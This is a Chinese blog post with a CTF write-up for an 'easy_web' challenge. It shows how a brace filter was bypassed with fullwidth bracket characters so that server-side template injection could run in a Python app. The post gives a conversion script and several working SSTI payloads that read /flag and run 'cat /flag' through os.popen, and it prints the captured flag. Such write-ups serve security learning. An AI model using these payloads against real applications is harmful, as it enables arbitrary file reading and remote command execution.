热门标签
热门文章
- 1大语言模型原理与工程实践:全参数微调
- 2Zookeeper(从入门到掌握)看完这一篇就够了
- 3UnicodeWarning: Unicode equal comparison failed to convert both arguments to Unicode[python中文字符串比较]
- 4Linux提权—脏牛漏洞(CVE-2016-5195)复现_脏牛提权 漏洞复现
- 5七大排序算法——归并排序,通俗易懂的思路讲解与图解(完整Java代码)_归并排序 通俗
- 6前缀和:区间和_给出 个数 , 次询问区间 的和
- 7[AI资讯·0527] OpenAI员工离职,马斯克获得60亿美元投资,国内大模型厂商降价争夺市场份额,中国电信推出多方言语音识别模型,苹果WWDC展示新AI战略,联想业绩回暖,谷歌AI搜索引擎遇错误
- 8xss绕过字符过滤_XSS小技巧绕过云WAF
- 9怎么理解FPGA的查找表与CPLD的乘积项
- 10解决前端如何使用插件crypto-js进行AES加密方式数据加密_cryptojs.aes
当前位置: article > 正文
CTF之easy_web_ctf easy!
作者:IT小白 | 2024-07-10 21:06:44
赞
踩
ctf easy!
打开网站就一个输入框,按理来说这种类型就是注入类型的漏洞了,至于什么注入还不知道
尝试了目录遍历以及漏洞扫描但是没有什么卵用,抓了一下包发现是python,所以考虑一下SSTI注入
但是好像{{}}被过滤了。
通过符号列表进行爆破,发现 / 也被过滤了,但是 ︷ 会被解析成 { ,︸ 会被解析成 }
然后就可以进行SSTI注入了
- """
- { -> ︷/﹛
- } -> ︸/﹜
- ' -> '
- , -> ,
- " -> "
- """
-
-
-
- #str = '''{{a.__init__.__globals__.__builtins__.eval("__import__('os').popen('ls').read()")}}''' # 原字符串
- str='{{().__class__.__bases__[0].__subclasses__()[91].__init__.__globals__.__builtins__['open'](\'/flag\').read()}}'
-
- #︷︷().__class__.__bases__[0].__subclasses__()[91].__init__.__globals__.__builtins__['open']('/flag').read()︸︸
-
-
- str = str.replace('{', '︷')
-
- str = str.replace('}', '︸')
-
- str = str.replace('\'',''' )
-
- str = str.replace('\"', '"')
-
-
-
- print(str)
下面是可以注入的ssti
- ︷︷().__class__.__mro__[1].__subclasses__()[91].__subclasses__()[91].__init__.__globals__.__builtins__['open']('/flag').read()︸︸
-
- ︷︷().__class__.__bases__[0].__subclasses__()[91].__init__.__globals__.__builtins__['open']('/flag').read()︸︸
-
- ︷︷().__class__.__bases__[0].__subclasses__()[91].__init__.__globals__.__builtins__['eval']("__import__('os').popen('cat /flag').read()")︸︸
得到flag{8f604f91-c36a-4413-bdaf-e786ffbfda61}
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/IT小白/article/detail/807703
推荐阅读
相关标签
